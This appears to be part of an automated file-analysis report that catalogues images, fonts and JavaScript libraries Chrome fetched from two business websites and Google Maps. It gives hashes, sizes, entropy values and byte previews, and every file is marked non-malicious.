                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3886
                                              Entropy (8bit):7.934858264863833
                                              Encrypted:false
                                              SSDEEP:48:rR0rsavyc18iStjC0uPCSSQ8LASuVJjeVjs1uLygAu3CnNVGMlGhSG+4Wc5:WNyc1sQPxoiJjGjs1DgANXewrA
                                              MD5:43C09CE328CD4B4723323487ED20047D
                                              SHA1:2D5EB828ED65D16B9FB8B81E1070809951AA9A64
                                              SHA-256:DF917693DD1E1A1091ADA90DCAE7F32B4E6EC33E668E50DB53E33C2C1F512B88
                                              SHA-512:EE73C5742A17B17D2C3E0151765671385184DA61F3DDF4CAB84ACEA53813A60C3D4C56B1955C7458946C1AB33D3BE3A6D7F7E4BBD0036B656366AB7A8E1BAA51
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/web_portal.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...p...Qv...0............Vz....N{y~.......l...........g.....hz..Ww.........n...S..Vv...y..g........(.....{..Xp.P~...j|....,..}}.h...Z.u.........W..Z|...^~.....~....l..................................[ur~......t..q.......5.......Gn,*A.Xp......=?Vbt.?........;.........H..R..QSh....t..\yV`z^.....l..V..ux.]..,..B.....b......il}....Y.9Ln._.....t....8.......'...j..e...\..~..r....a.......M#.....|.w..a.}3].A]..+..`..m.......u.FF%...3IDATh...W.....!,...$@....K...j@.X.....U..G..j........'..h......3.$&..~.g.D...%.HM......B".JDI.PH.j..G..>mkR.xN....SS....)...3.L..Z.8[....JzeE/R.Z..k.....O.....}".0L.].........g.........1.8j.......*............5.]].u.."e...x..OK$......M...........j.f...\.N..U9....a.2...4.n.I....V.D.."....Z.X...V+Vjn.....5[...(.0....`>.SK|>.V(.H..T......u....~.T:..l..w...O.3d.N..Ab.<.h!...,....,..k...~(...o.......d........C..a.G....KC..MH.)........rU{..o...s..E<~.....V}_.-s.@........".w.%..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 24540, version 1.0
                                              Category:downloaded
                                              Size (bytes):24540
                                              Entropy (8bit):7.990581550827828
                                              Encrypted:true
                                              SSDEEP:384:mjFxLbMqVqp/q3C1mRQYrlV0F4Gq5HD6CecY7fcGBfsKzWqC7h9nShMtDU42rMs:exLbJqp/qy1mLr2LcYzPVsnVIZ427
                                              MD5:DB3B4B064DA38CC3E576D3D0A19FDFAA
                                              SHA1:D8FF80F264C03F12CCC44F9321A5D8C161D4518F
                                              SHA-256:BFBA24E0F1756EEA6091B40F0288187A2CF51D55CC9CA4E53CCDC00E9BD84A96
                                              SHA-512:D9DDB0E021284345611294CCFC94436E49EA89FB74BA20A7749D3ACDA52D9162229AAFB697EB1E4700C0A69528694C93DB6A147B566368325A68F8411EAD3728
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/fonts/sora/Sora-Bold.woff2
                                              Preview:wOF2......_..........._|........................?FFTM..x...h..x.`........p..C.....6.$.... .......T.w0.k.'.A......ZK..g.(.].........q@.._^......l.a..d.......pA...2W.,QD+X_.`...........bM..n0.3.H.....n.s.......]3..uA)..Ypj.G|.Q.#...=XT.T.t*\e#Lm..4.=...1..o:.....C..dF.i.L...=..a,.....R........<.w.e.........P'KqhL..2.J.J.:9..;..Fp:.7..7P..*'a..T..n.?"..>5y..1p...'&..4.D3.%-..OK.%...g..@"1....g.=,..R...!..j.O.h..:...Q5jf)5sjf."$.}.V....`..u.C.....a.A..H.".(a`b....6..]...]....c...#....P.+L...6..?`...k&..0... .<.fR._{....'...v...5...P...|..e.uZ.9....B`(8.aN.id...]n2..-W:.*..SR.?,.....s.UN..d$..WA.(....0..*....W..]..j..$0?.8.......L2....n..%._c*d.vO.A./...m..-3.....b.F..X.y/V ..Vh4..6Sdj!&.F(&..w......<. H.bSi...R.gX...$IFm..bz.y..b...b^.....O...El.7r...<.p...j.t.......0.O.........f.daF..R$.`[q]......Mno..(.,/..0.(jG.o..5KQW.Z..G|.3X.g.y...s.....k..`v....).K.(...Q4..E..v../.3......[w..<oLd.7.>N....O..D....7...*1.0]8.q..r..&}B.M....8...eV..Li~.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2954
                                              Entropy (8bit):7.917427637196805
                                              Encrypted:false
                                              SSDEEP:48:8ZqF+DlS3keZt7x4xT84s7R8qgLDMeg7o7MjfJKuqoaquMajpvGIDUaqBm:Z+DpWxXSIej7MDX1IP9
                                              MD5:4287C826185C2869D46A4A67594A8DE5
                                              SHA1:E1F5CDEDDBF32D563346C94C763E9E98FFD04153
                                              SHA-256:BF93A11B4A927B2E6191E1E70E9BAB23F35665CF859E9BB37789CB8A98243BC1
                                              SHA-512:8718F00C4521AED747364CD5944DE0F01B57A7CB3CD7C36786BFE1118AFED665BA02F310990D0EB669951D4C840C788AA06997D5FFE4C896E062553F34432417
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...l....9......|....,.#.r.............w.H.[............0.`.h.S....B.w....O..........o.......=........'.....>............].O...=[.<....IDATh.....L..).....V.....q.f..r...w...zf.&.v...)J..$...N...6Pv8..`..~C.Q .V.u=...\5.1...@.(`...).!......!.s..~f?.r.$.`..[..3..*m-......p.)A...k.0..*.I.9].._r..#.8.n$.e8L.....D....@.O.........,.....HW..1.."... ..l...a...`.....Wq.ob.H.B.4rcF.f+...a.pFs..>..o.Q*..5O.....lV.5.5`. ..K_..(...]O'..".gO..H\..l........u.......;..C.7.5...h.MaY...4...G.A.J.%.arBt,..v+05r!..F...<.....s..|>..h!..A'.......a....#../..$..@i.h.. .d8.....l....i.F...G|...c ^.h...l...&.9....ox....,..%..!e........X....P8............6.7..O%|.>...H.........:X.....H.(..k.b]....3........m..~...>....~..N.,d...")...x.>..'....x.t..Q...T....B.a{4...r.z..$.O..|.'R.:....._.OX{>B&.LU.5.. .......8...T.3..6~..8...0.o.e.>..?B..b.x...%...P}.......:..8K....x`..i..n\.Z.@.?B.4..$.43..3.G.~'..Zu8...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):11765
                                              Entropy (8bit):7.556641638855572
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwi7uh061iztxTgsUX/petmLZkALuaRiGDF7csL:4YNg7i7A0pB5spDLZkwuSiGDFI6
                                              MD5:3813B9ED5A106BE86BF5602AC6F85014
                                              SHA1:E74907DCBE486924CEE187B67759B73B5A5CC717
                                              SHA-256:1A08469DB7A8219504FA882221D54F1DA499A713150B0F5C7CE25B807705A04E
                                              SHA-512:C7ED630A05FF28253A89F77F05E6239333E51F2FA03E37F95ED4ABD56172ACBA6CC78190DEBE21C8CEC406714BCE3EAD651E67587BE5B50A45A7711FB88D6736
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/42/127f314bccd9badeb03578047c9cb10a.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (4599)
                                              Category:downloaded
                                              Size (bytes):242785
                                              Entropy (8bit):5.694550757163063
                                              Encrypted:false
                                              SSDEEP:3072:tYjmEMff7T2m2xbBx+Q7k9/u+3WZLo9pFZt9:tAmdwxvz7ko4WZLo9pLH
                                              MD5:9C7F2BF38E74C943D9D73E38B1042544
                                              SHA1:432C5C2CB5A5B58C35114BFBBEAE3C701BC3AC16
                                              SHA-256:E3BAB8703D23B4A6342BB78CE8E9025EA8673C1C22C26A29BFFFF4A5184CC521
                                              SHA-512:371841087F95881EE45F51E09D5599659C8265F0A8A7731DB8FC429CA793B59141077C038CD0904AAD91B85268EE6FDCEC3B98700A11FA986236843E6C6FBD7B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.gstatic.com/maps-api-v3/embed/js/58/6/init_embed.js
                                              Preview:(function() {'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function ea(a){return function(){return this[a]}}function fa(a){return function(){return a}}var m;function ha(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ia=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ja(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var la=ja(this);function p(a,b){if(b)a:{var c=la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ia(c,a,{configurable:!0,writable:!0,value:b})}}.p("Symbol",function(a){function b(f){if(this instanceo
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (4632)
                                              Category:downloaded
                                              Size (bytes):31006
                                              Entropy (8bit):5.548029155315869
                                              Encrypted:false
                                              SSDEEP:768:qJhfJmZTlv2TmXEJ24mk/B4UnbjLeYX8iHMfBcv5mc5ajNeB1o0oAWYOxIFTWwrq:8BbvXQrNeG8y
                                              MD5:B3E361BAAD69070C65C4394FC804D91A
                                              SHA1:FD42AAFB6463713F2BE75A5B73F08DDDF4DF6CB4
                                              SHA-256:D8427421CEE0B7A9768B360DA1C8F81E6F49E5561AC44884B627C8070156C3E3
                                              SHA-512:0BD3D87BE1C52431A8B374D059364F8568ECA7343AC0CE2222B64DEF544D97731B86C8B3A49DC44E2EDFF0234A3C9CD91E1801B8CFCB9B0C88BC96E7D6E40679
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/onion.js
                                              Preview:google.maps.__gjsload__('onion', function(_){var gZa,hZa,iZa,WP,ZP,YP,lZa,mZa,nZa,kZa,oZa,aQ,pZa,qZa,rZa,uZa,wZa,xZa,zZa,AZa,DZa,FZa,HZa,KZa,GZa,IZa,MZa,JZa,NZa,fQ,gQ,eQ,hQ,SZa,TZa,iQ,UZa,VZa,jQ,WZa,XZa,kQ,c_a,b_a,nQ,h_a,i_a,j_a,g_a,k_a,m_a,pQ,q_a,r_a,s_a,l_a,n_a,o_a,t_a,u_a,oQ,D_a,E_a,H_a,G_a;gZa=function(a){a=_.kJa(a);if(!a)return null;var b=new VP;b=_.Yd(b,1,_.qD(String(_.Ec(_.Xg(a.Fg))),0));a=_.Yd(b,2,_.qD(String(_.Ec(_.Xg(a.Eg))),0));b=new eZa;a=_.qe(b,VP,1,a);return _.Kb(fZa(a),4)};hZa=function(a,b){_.Bg(a.Gg,1,b)};.iZa=function(a,b){_.Bg(a.Gg,2,b)};WP=function(){jZa||(jZa=[_.N,_.M,_.O])};ZP=function(a){_.LG.call(this,a,XP);YP(a)};YP=function(a){_.cG(a,XP)||(_.bG(a,XP,{entity:0,Ym:1},["div",,1,0,[" ",["div",,1,1,[" ",["div",576,1,2,"Dutch Cheese Cakes"]," "]]," ",["div",,1,3,[" ",["span",576,1,4,"Central Station"]," ",["div",,1,5]," "]]," "]],[],kZa()),_.cG(a,"t-ZGhYQtxECIs")||_.bG(a,"t-ZGhYQtxECIs",{},["jsl",,1,0," Station is accessible "],[],[["$t","t-ZGhYQtxECIs"]]))};lZa=func
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):130860
                                              Entropy (8bit):7.997712309008883
                                              Encrypted:true
                                              SSDEEP:3072:ubDYIS/1wynedxOwOizaQzHSKnqUYA7ka:u4IdyngxOwOizFznfYEk
                                              MD5:9D5B0A8F0C69E3B1B0BB1F0565435349
                                              SHA1:E39A9C61D7C9E0236B8160ECE3A51E91519987EF
                                              SHA-256:1CA5E96A3F88CBBC3612310CC6C0B1C41108DC9D343A953CF98FE2E4E2E52A4C
                                              SHA-512:0D0D44587247269C71AF2DF4E5F4573C5882F670EB36A247F137227214228B478F6833760A92FA3EFBD6B0E1B9CC1E16A4B95979249E7DAD3AD24A45FCAEFBA6
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/services/hosting.webp
                                              Preview:RIFF$...WEBPVP8X........7..(..ALPHwp.....m.I....u...7"&...2*.....@..E'.|.+F:g..i!FP....Jq....i.W...v.f.....T.*.p$.......*....U..=...b...........E.V..:............l{.H./..G.@0.J@.(.c...a..h@q..A.....~...D.-.v..$*..F......../.u{_.......k.S.^..q<....{.+..u{/.z....t$oK..d..-2b..l.......YL.z..1..ix.......#8}..O.........&....`q)..?..u..n.{.........dT...1..9..Z....E..].M._.NN...ah....y..w..>..7.<X....2.Yv.a.H?...#hh$Z.s..eH.H.R|....,.:.5e.y.!..a.'...".q...O8.#,m./C.....#...B.8..q..#.\.1..N.hu..X0..>z.G9....H....bG{d."|...1.qA%.y.1.<..9.K.V...'...0y..........#........._.......v..A..v...q.;Of..?..._...Q........v..?....}...q.&..-R...=Y.9....F...n...G..:...uJ....K.....D.=6;...[......sQ..B.....?.a.~uo........$.R...<......n... ....q.g.J...8.."=....?G........9.*K..~....?..q3....Yl.e.C...<....S......H..!.G...^Z..e.3K.;.?u$...ICUmQ......Y..Eg.E.k.........(.r......~?.._&...B...o....=:z.....f.-+......u....ju..M...:.....IE}.w.:*t....m..tSA*.......N^.KGM.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                              Category:dropped
                                              Size (bytes):530
                                              Entropy (8bit):7.2576396280117494
                                              Encrypted:false
                                              SSDEEP:12:6v/7OEUhUxzPKmghSn8nazyk+k8/OzxQcxNMvVb:bhUxzlvWkT8FcxK1
                                              MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                              SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                              SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                              SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):16984
                                              Entropy (8bit):7.982935730760655
                                              Encrypted:false
                                              SSDEEP:384:6AQncdA+Jd8uGzouNa8FwTIUVwslUeg2/XcK/tVOG:6AQn/gdhCoD8UIU7lUH2/jSG
                                              MD5:80C05DF4740296760EB2223059123ECA
                                              SHA1:617C040388AAA3919173C98309116020274303D0
                                              SHA-256:3D1973B997D5EEA89B6584722D11211AD123B4C56AE7DA2B5D1F27449F8DA050
                                              SHA-512:65BEE85602E1AD76897778B398F178988109F384A8AA4CC7E2E6179E06B4A35A920C047A622B0CAD4D799D98A80C37C7154226D8318046515C79D275AE954FEF
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFPB..WEBPVP8LDB../..?.g. .mU...q........tpw......d.6.w...1.v...5'.p[....;..."J..r`.}...t...`.....5G#:..U....*......W.N... D'..&.....,...G.8UW..>*..<E..+..b,p..j.U..$...A.....5.......{q..<....rs+.v...F..";sK.A.../...jh.we.i......,....&.....!.Z...V..{.k"..b..W....~c.....<_\.+... z>..N.x...PH..~3..&..t<..........'..j#[.....K.mp..l...8.l*..Z ........kFy..|...........C."B.L.........D...]..:R..%......./...._.....O?..Uk.>{L1.....F...\O...uW.P.ik.."F.f.Q..#.<....2-...7.).l.h.?&.y..P.]g..Q...s|..x..G.......j.........1<.?..7..c... .3"6-Q..5.^.V:.`.....~..w.9...%...'+L.:....M.hX...D......u..h........C...>;N...dx.4..I...v.%........r.\.:N..q7....K...f.th..x..M$.S...|fL...s....i..tg)..U.N^..w.*.D....:%.rs...1.\{.3.o`o..I....K..{..9.J:D.<<.dXKN..+........w1..>..._E.4.zTR.j.9.q.....7O...j....f.A..+...9.t.%2..B..A....%..:.%.!V.;...'%......v.F.b.a.....h.J<.gB.#.{..I,.w.F.LU.3.G......5.<.._]}f..*.#..C1.X.6.N....3..pY..9.wFY...:..s.f..4<.s......hT.\.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6450
                                              Entropy (8bit):7.945327591543389
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xDdWbXZ0/a53GocvMnH1NTuHc0bmUSoYe88I:UIIHUCD4watOz52oce/TuOUN88I
                                              MD5:2D1BE37DE7B681C1AC77A23716FB4B3D
                                              SHA1:B952929F418B652001932508DF9816037E019911
                                              SHA-256:935965DE26DD0DA7905ABF2084A7C337CBC3406391DA896B721BAC5D0DDCFE21
                                              SHA-512:884BD3CE0D36AAF644A8C35FC1183CCA0FED93CA782A44B986CEF18688AF916BF7804E0CF8A572E2A9BDA629D000F5B0D524C5CAE1F7D40A0BDA04A04458649C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/17.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (43610)
                                              Category:dropped
                                              Size (bytes):46174
                                              Entropy (8bit):5.613451807456783
                                              Encrypted:false
                                              SSDEEP:384:FvrK5XUVkt9HUHGQQ1q7vepKyDBUgwnwM4aGLZlS/dDZM6c7VY+nlKaDvAJC5LDG:N+MktAwJcbMSWNs741uuZMmJ1j5KOLeT
                                              MD5:7419D08BBF4250BFEC1EB4670D5A448A
                                              SHA1:BBAA5D68BDB2E1CD531D18171A55A07DE761D19B
                                              SHA-256:A19AA0DF3B7974028724B2666D8311A226ACEDC65A90947C7BC56EECB9A367AD
                                              SHA-512:CC89C5175EEA04556FBEF16921F781CE8ED38FBFAB4312DE4C90E66F18C1CF9FF322BF3D6156D335E94D85D4D3FBF0C2AF1A15CC17943D5149B1CCCA6C1EEC7B
                                              Malicious:false
                                              Reputation:low
                                              Preview:/**. * chroma.js - JavaScript library for color conversions. *. * Copyright (c) 2011-2019, Gregor Aisch. * All rights reserved.. *. * Redistribution and use in source and binary forms, with or without. * modification, are permitted provided that the following conditions are met:. *. * 1. Redistributions of source code must retain the above copyright notice, this. * list of conditions and the following disclaimer.. *. * 2. Redistributions in binary form must reproduce the above copyright notice,. * this list of conditions and the following disclaimer in the documentation. * and/or other materials provided with the distribution.. *. * 3. The name Gregor Aisch may not be used to endorse or promote products. * derived from this software without specific prior written permission.. *. * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS". * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE. * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FO
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65451)
                                              Category:downloaded
                                              Size (bytes):89476
                                              Entropy (8bit):5.2896589255084425
                                              Encrypted:false
                                              SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                              MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                              SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                              SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                              SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                              Malicious:false
                                              Reputation:low
                                              URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                              Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):7021
                                              Entropy (8bit):7.963138887931751
                                              Encrypted:false
                                              SSDEEP:96:F+nSzMCCcXuZ5HkwXWaPYo3wUF0vLK3gYtvSKX59Y1TY2O1eEbVhwsAERkb:CSzPCcXunkwTPR3wUFzRSKpt++V3AJb
                                              MD5:1C1EA7D94632993B0FECC9BDA375692D
                                              SHA1:4FF7974F3C7CB13DD7FF2EA50D364660FA361AA0
                                              SHA-256:D22BF0628B62B791D542907EAD37B6691F15D8ADABB0FDDECFDE85C62F1AB9DE
                                              SHA-512:0824946CDEEA3D6745B023CF1471F9254BEB176B05C9BD45ACDC4B0DAA30D716A3FB747CC20D956475BE59CC6E8D2CB69EA3F2968701727088FA7CFB140B8239
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/content.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.........IH....:8h96eFG.=7g.@T...;9k;3i@;jCCx>:e..5DE}:7_>4n...64c>5c..@=....<>:o>5j37h........C.....SE..5;e.........4:o...G2d4;`.+UC..0._..W7/e61o...75U....t.4:Z..>.au9>i....AWL....%..%?.....81]..IC:t.......XnMM..CY..?..B@qB0_.....2..>?:`>....G=.....G4j..:.>M..L....BP;?v..2...27x.........0=iu...m...O\..J..../E.....5..>3y..,....s.EB...A.......VIF.IJx..1B<W.........1Q.[..7@.....>[..,.......?...C....,%Hsq.. \.._.........ZV..9Yed....QMn=)W|..1........HQ...i.../d}|.......+}..>\...[....VA^5h.'a[t%>pmPO....P..~........Od*)j....3s...IGh...L...`A..S....=...(.......V3V-...)VO5j...#..H4FVDK.qOXT.wu......m.$..M......;h.{{pm.V..)i...X..K.B.=.....^..........m<v)^..Q.....#9[..E....P..iV.w...^........M6...I..m........B.;^9Z.].........>k......Q........;.....(IDATh.._L.y..i3m..s..N)....L....).B..Pl...)%.P@$..h..T....Dj.Y4.D.D.Q.D\..k....g.E}`.......l...MK..>..8...g..g.....f..0...`P.4..56{...O..<.....]....`|.....X,.......?.c...c.M....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, xresolution=86, yresolution=94, resolutionunit=3, software=Adobe Photoshop Lightroom 6.7 (Windows), datetime=2020:02:09 17:53:12], baseline, precision 8, 1024x640, components 3
                                              Category:downloaded
                                              Size (bytes):186098
                                              Entropy (8bit):7.90756826038093
                                              Encrypted:false
                                              SSDEEP:3072:pbDb8615llrNXsyIh0a5Qf7yJZeBoNFElpb3fJ8W3gw05a1xL3:9Xz5TNXsyIh/5zbsbB8Kgw05SxL3
                                              MD5:0B4916AD93ECE7CF236B3A0E3D691A67
                                              SHA1:1C59F75F9CFFC2E7E75282440B2F86BB5F256A30
                                              SHA-256:63642C76B1CF73C04DD54C6AB0F9678C27F223EB0DA5E2F274C4023892472879
                                              SHA-512:0D16132C76C75A0A8C382ABA1A0FAE134D77EC5CE3D29137974B3F252C0EB2AF00445DF19AECCC2D9111943D58EF5D2CCFD56F9AA94B88E3F4DCDCDF0526B060
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/news/8/f4810eb779b4747ca187846d0aff124a.jpg
                                              Preview:......JFIF............(FExif..MM.*.................V...........^.(...........1.....(...f.2...........i.................;.......;....Adobe Photoshop Lightroom 6.7 (Windows).2020:02:09 17:53:12...........0230.........................................................(..................... ..........'........H.......H................................................................................................................................................. ....Adobe.d......................................................................................................!..1AQ"2aq.B.....Rb...#Cr......$3......&7Sce.........................!1A.Qq"3a2.#b..4BR................?.R....`.X...2@...$.. .H...d.. &H...d.. &H...d.9 .H....! .$...B.0X..$0X......R=..R.......".).2@...$...2@L..$...2@L..$...2@...$.....L..%.w<.A'."-..d....c56-,S.......h.Y.?.h......]...-..s.p..{.{{Ld....i..{..vvu....6.....7.._O..._.3st..3.UAc[0..! .$.... ?...)...)H.R...R..$...2@...d.. .H...d.. &H...d.. .U4..T....UA'
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):21012
                                              Entropy (8bit):7.806426193294855
                                              Encrypted:false
                                              SSDEEP:384:4YNg7NQIN85aD5mGuiO+dWHIEJOVtEZ0PjyzBAJkGDqO8VHG+Pi4P4//9:4Yyti5aQGuiNWHD4IZ0ryNAJkGqOqmI4
